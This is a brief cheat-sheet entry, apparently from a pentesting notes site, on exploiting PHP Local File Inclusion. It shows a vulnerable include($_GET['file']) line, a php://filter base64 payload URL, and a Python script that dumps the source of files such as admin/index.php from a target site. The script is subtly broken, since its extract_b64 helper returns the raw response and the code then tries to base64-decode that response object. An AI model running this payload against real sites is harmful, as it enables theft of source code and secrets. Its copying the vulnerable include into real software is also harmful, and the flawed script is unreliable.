Local File Inclusion (PHP)

Exemple of Local File Inclusion

include($_GET["file"]);

This code include in the responce a file controled by an argument. Php code included is interpreted by defauld.

Read php source

To avoid interpreting the included php, we can pass php://filter/convert.base64-encode/resource=path/to/file as the file to include the base 64 encode page insted.

examples:

http://www.example.com/vuln.php?file=php://filter/convert.base64-encode/resource=vuln.php

import requests
import base64

files = [
    'index.php',
    'admin/index.php',
]

URL_VULN = "http://www.example.com/vuln.php"
ARG = "file"

def extract_b64(html):
    """ Extract the b64 from the responce.
    """
    return html

for file in files:
    payload = {
        ARG: f"php://filter/convert.base64-encode/resource={file}"
    }
    response = requests.get(URL_VULN, params=payload)
    file_b64 = extract_b64(response)
    file_content = base64.b64decode(file_b64)
    with open(file, 'bw') as f:
        f.write(file_content)